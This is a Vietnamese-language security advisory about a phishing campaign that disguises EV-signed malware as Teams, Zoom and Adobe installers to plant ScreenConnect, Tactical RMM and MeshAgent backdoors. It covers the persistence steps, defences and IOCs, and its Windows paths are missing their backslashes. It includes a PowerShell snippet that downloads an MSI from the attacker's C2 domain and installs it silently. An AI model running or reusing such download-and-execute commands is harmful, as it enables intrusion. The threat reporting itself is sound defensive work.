Một chiến dịch tấn công mạng lừa đảo mới đã được phát hiện, nhắm mục tiêu vào người dùng doanh nghiệp bằng cách ngụy trang phần mềm độc hại thành các ứng dụng làm việc phổ biến như Microsoft Teams, Zoom và Adobe Acrobat Reader.

Điểm đáng chú ý của mối đe dọa này là các tệp độc hại mang chữ ký số hợp lệ, khiến chúng khó bị người dùng thông thường và các công cụ bảo mật cơ bản phát hiện.

Tổng Quan Chiến Dịch và Vector Ban Đầu

Kỹ Thuật Lừa Đảo và Đặc Điểm Nhận Dạng

Chiến dịch xuất hiện lần đầu vào Tháng 2 năm 2026, với nhiều đợt lừa đảo qua email nhắm vào các tổ chức. Nội dung email xoay quanh lời mời họp, tài liệu tài chính, hóa đơn và thông báo công việc thường lệ.

Mỗi tin nhắn được thiết kế để thuyết phục người nhận tải xuống một bản cập nhật phần mềm quen thuộc hoặc một trình cài đặt ứng dụng tiêu chuẩn.

Giả Mạo Ứng Dụng Hợp Pháp

Các tệp độc hại mang tên như msteams.exe, zoomworkspace.clientsetup.exe, adobereader.exe, trustconnectagent.exe và invite.exe.

Tất cả các tên này đều được chọn để mô phỏng các ứng dụng thực và đáng tin cậy.

Điều quan trọng là mỗi tệp đều được ký điện tử bằng chứng chỉ Extended Validation (EV) cấp cho TrustConnect Software PTY LTD. Các tác nhân đe dọa đã lạm dụng chứng chỉ này để khiến các tệp có vẻ hợp pháp đối với nạn nhân không nghi ngờ.

Các chuyên gia của Microsoft Defender đã xác định các chiến dịch này thông qua dữ liệu đo từ xa của Defender, xác nhận một nỗ lực đa vector có chủ đích từ một tác nhân đe dọa chưa xác định. Xem thêm chi tiết tại Microsoft Security Blog.

Các nhà nghiên cứu lưu ý rằng kẻ tấn công đã dựa vào sự nhận diện thương hiệu làm vũ khí chính. Khi một tệp có chữ ký số hợp lệ và trông giống một ứng dụng nổi tiếng, hầu hết người dùng không nghi ngờ.

Cơ Chế Khai Thác và Duy Trì Quyền Truy Cập

Triển Khai Công Cụ RMM

Khi được thực thi, mã độc đã ký sẽ âm thầm triển khai các công cụ giám sát và quản lý từ xa (RMM), cụ thể là ScreenConnect, Tactical RMM và Mesh Agent.

Điều này cung cấp cho kẻ tấn công quyền kiểm soát liên tục và bí mật đối với máy tính bị xâm nhập.

Phạm vi của chiến dịch này vượt xa một thiết bị bị nhiễm. Với các công cụ RMM chạy ẩn, kẻ tấn công có thể điều khiển hệ thống từ xa, di chuyển ngang qua mạng, thu thập dữ liệu nhạy cảm và đẩy các payload bổ sung.

Tất cả những hành động này diễn ra mà không tạo ra các cảnh báo thông thường, vốn sẽ cảnh báo nạn nhân hoặc nhóm bảo mật.

Do đây là các nền tảng phần mềm hợp pháp được sử dụng cho mục đích độc hại, các công cụ phát hiện dựa trên quét chữ ký thường bỏ qua chúng.

Sự kết hợp giữa các mồi nhử lừa đảo, tên thương hiệu quen thuộc, chứng chỉ hợp lệ và các framework RMM đáng tin cậy khiến chiến dịch này rất khó bị chặn ngay tại điểm nhập cảnh ban đầu.

Các Bước Thiết Lập Duy Trì Quyền

Sau khi nạn nhân chạy một trong các ứng dụng ngụy trang, mã độc thực hiện một chuỗi các bước có chủ đích để cài đặt vững chắc vào hệ điều hành.

• Tệp thực thi đầu tiên tạo một bản sao thứ cấp dưới đường dẫn C:Program Files, khiến nó trông giống như một chương trình được cài đặt đúng cách thay vì một tệp được tải xuống từ trình duyệt.
• Sau đó, nó đăng ký bản sao đó làm dịch vụ Windows, đảm bảo backdoor sẽ tự động khởi động mỗi khi hệ thống khởi động lại.
• Để bổ sung biện pháp duy trì quyền, một khóa Registry Run đã được ghi vào HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun dưới tên giá trị TrustConnectAgent, trỏ trực tiếp đến tệp thực thi đã ngụy trang.
• Mã độc sau đó mở một kết nối ra bên ngoài đến tên miền Command and Control (C2) do kẻ tấn công kiểm soát: trustconnectsoftware[.]com.

Kênh Truy Cập Đa Lớp

Các lệnh PowerShell được mã hóa sẽ tải các tệp cài đặt máy khách ScreenConnect (.msi) vào thư mục tạm thời của hệ thống. Tiện ích msiexec.exe của Windows sau đó thực thi chúng một cách âm thầm.

Điều này nhúng nhiều mục registry dưới HKLMSYSTEMControlSet001ServicesScreenConnect Client, gắn chặt backdoor vào hệ điều hành để sống sót sau khi khởi động lại và duy trì quyền truy cập liên tục.

Để củng cố quyền kiểm soát môi trường, tác nhân đe dọa đã sử dụng cùng một pipeline PowerShell để triển khai Tactical RMM, và đến lượt nó, cài đặt MeshAgent làm kênh truy cập từ xa thứ ba.

Cách tiếp cận phân lớp này được tính toán kỹ lưỡng: nếu một backdoor bị phát hiện và loại bỏ, các backdoor khác vẫn tiếp tục chạy mà không bị gián đoạn, gây ra rủi ro bảo mật nghiêm trọng.

# Ví dụ lệnh PowerShell (giả định) để tải và thực thi MSI
Invoke-WebRequest -Uri "http://trustconnectsoftware.com/client.msi" -OutFile "$env:TEMPclient.msi"
Start-Process msiexec.exe -ArgumentList "/i $env:TEMPclient.msi /qn" -Wait

Biện Pháp Phòng Ngừa và Phát Hiện

Để bảo vệ hệ thống khỏi những cuộc tấn công mạng tinh vi như thế này, các tổ chức cần triển khai các biện pháp bảo mật chủ động và đa lớp.

• Chặn các công cụ RMM không được phê duyệt bằng Windows Defender Application Control hoặc AppLocker.
• Bắt buộc xác thực đa yếu tố (MFA) trên tất cả các hệ thống RMM được phê duyệt.
• Kích hoạt Safe Links, Safe Attachments và Zero-hour Auto Purge để chặn email độc hại trước khi người dùng tương tác với chúng.
• Bảo vệ được cung cấp qua đám mây (Cloud-delivered protection) phải luôn hoạt động trên phần mềm chống virus điểm cuối để nhanh chóng phát hiện các biến thể mã độc mới.
• Các quy tắc giảm thiểu bề mặt tấn công (Attack Surface Reduction rules) nhắm mục tiêu vào các tệp thực thi không đáng tin cậy và tạo tiến trình dựa trên PsExec hoặc WMI nên được triển khai trên tất cả các điểm cuối.

Chỉ Số Thỏa Hiệp (IOCs)

Các chỉ số thỏa hiệp sau đây có thể được sử dụng để phát hiện và ngăn chặn các cuộc tấn công mạng liên quan đến chiến dịch này:

• Tên miền C2:trustconnectsoftware[.]com
• Tên tệp độc hại giả mạo:
  • msteams.exe
  • zoomworkspace.clientsetup.exe
  • adobereader.exe
  • trustconnectagent.exe
  • invite.exe
• Khóa Registry:HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunTrustConnectAgent
• Đường dẫn cài đặt tệp độc hại:C:Program Files<tên_tệp_độc_hại> (ví dụ: C:Program Filesmsteams.exe)
• Dịch vụ Windows được tạo: Tên dịch vụ liên quan đến tệp độc hại hoặc ScreenConnect Client, Tactical RMM, Mesh Agent.
• Mục Registry của ScreenConnect Client:HKLMSYSTEMControlSet001ServicesScreenConnect Client